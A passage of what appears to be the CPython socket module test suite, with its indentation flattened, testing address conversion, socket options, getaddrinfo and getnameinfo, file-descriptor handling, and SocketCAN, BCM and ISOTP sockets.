g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = socket_helper.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it is reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# A newly created socket should start with SO_REUSEADDR disabled (reuse == 0)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = socket_helper.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = socket_helper.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
              "not implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if socket_helper.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: exercise the workaround for an OS X getaddrinfo() segfault bug
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care about here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet db before running test
# (issue #12804, issue #25138).
with socket_helper.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(socket_helper.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (socket_helper.HOSTv6, 0, -10))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or is undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Mac OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or is undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd, because on this path it doesn't actually verify the family
# and type before populating the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if socket_helper.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaisesRegex(TypeError, "integer argument expected"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaisesRegex(TypeError, "integer is required"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
address = ('', )
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
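# Note: can_frame_fmt comes from the SocketCAN base test class and is
# assumed to match Linux's struct can_frame layout, typically "=IB3x8s"
# (32-bit CAN id, 8-bit DLC, 3 pad bytes, 8 data bytes; 16 bytes total,
# consistent with the len(self.cf) == 16 assertion below). For example:
#
#   struct.pack("=IB3x8s", 0x123, 3, b'\x01\x02\x03'.ljust(8, b'\x00'))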
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
